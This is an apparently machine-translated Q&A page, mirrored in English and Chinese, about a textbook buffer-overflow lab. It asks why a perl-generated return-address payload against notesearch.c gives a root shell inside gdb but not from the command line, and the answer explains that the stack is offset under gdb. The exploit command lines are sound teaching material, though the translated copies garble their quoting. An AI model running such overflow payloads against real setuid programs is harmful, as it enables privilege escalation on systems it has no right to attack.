[英]Exploit works in gdb but not on the command line
I've been going through "hacking: The art of exploitation" and following the examples. 我一直在研究“黑客:剥削的艺术”并遵循这些示例。 On page 145, the author demonstrates how to exploit the notesearch.c program with shellcode stored in an environment variable.
在第145页上,作者演示了如何利用存储在环境变量中的shellcode利用notesearch.c程序。 Erickson does this with the following:
Erickson通过以下方式做到这一点:
./notesearch $(perl -e 'print "\\x47\\xf9\\xff\\xbf"x40')
./notesearch $(perl -e'print“ \\ x47 \\ xf9 \\ xff \\ xbf” x40')
On the command line, this doesn't work for me, but in GDB, typing 在命令行上,这对我不起作用,但是在GDB中,键入
run $(perl -e 'print "\\x47\\xf9\\xff\\xbf"x40')
运行$(perl -e'print“ \\ x47 \\ xf9 \\ xff \\ xbf” x40')
does work. 确实有效。
Notes: Now of course, his address above is different than my address due to protections in the CPU, but I just followed his example by running notesearch in gdb, getting the address of the shellcode in the environment variable, adding 100 to it: 注意:现在,由于CPU的保护,上面的地址当然与我的地址不同,但是我只是按照他的示例在gdb中运行notesearch,在环境变量中获取shellcode的地址,并向其中添加100:
(gdb) x/ s 0xbffff8e3 + 100
(gdb)x / s 0xbffff8e3 + 100
Of course my address is different than his above, but still, everything checked out, but it didn't work. 当然,我的地址和他上面的地址不同,但是仍然结帐,但没有用。
****BUT**** ****但****
When I run his exploit code in GDB, it works fine. 当我在GDB中运行他的漏洞利用代码时,它可以正常工作。
run $(perl -e 'print "\\x47\\xf9\\xff\\xbf"x40') 运行$(perl -e'print“ \\ x47 \\ xf9 \\ xff \\ xbf” x40')
So why would 那为什么会
run $(perl -e 'print "\\x47\\xf9\\xff\\xbf"x40')
运行$(perl -e'print“ \\ x47 \\ xf9 \\ xff \\ xbf” x40')
work in gdb, and give me a root shell but 在gdb中工作,并给我一个root shell,但是
./notesearch $(perl -e 'print "\\x47\\xf9\\xff\\xbf"x40')
./notesearch $(perl -e'print“ \\ x47 \\ xf9 \\ xff \\ xbf” x40')
on the command line won't work? 在命令行上不起作用? Is address randomization turned off in gdb but not in the OS?
是否在gdb中关闭了地址随机化功能,但在OS中未关闭? Is there a mismatch between what addresses GDB shows and what addresses the program is really running at?
GDB显示的地址与程序实际运行的地址之间是否不匹配? Thanks in advance for any guidance.
在此先感谢您的指导。
We don't need to draw on ASLR to explain why Exploit works in gdb but not on the command line . 我们不需要借助ASLR来解释Exploit为什么可以在gdb中工作,而不能在命令行上工作 。 When running in GDB, the stack location is simply shifted a bit (on my system, 80 Bytes down), so the provided address
0xbffff947
needs to be adjusted to work from the shell command line. 在GDB中运行时,堆栈位置只是简单地移动了一点(在我的系统上,向下移动了80个字节),因此需要对提供的地址
0xbffff947
进行调整以从Shell命令行运行。 To verify this, just have a look by putting eg 为了验证这一点,只需看一下例如
printf("searchstring = %p\n", searchstring);
in notesearch.c
; 在
notesearch.c
; you'll possibly see a constant address every time you run the command from the shell, and another constant address every time you run from GDB. 每次从shell运行命令时,您可能都会看到一个常量地址,而每次从GDB运行时,您可能会看到另一个常量地址。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.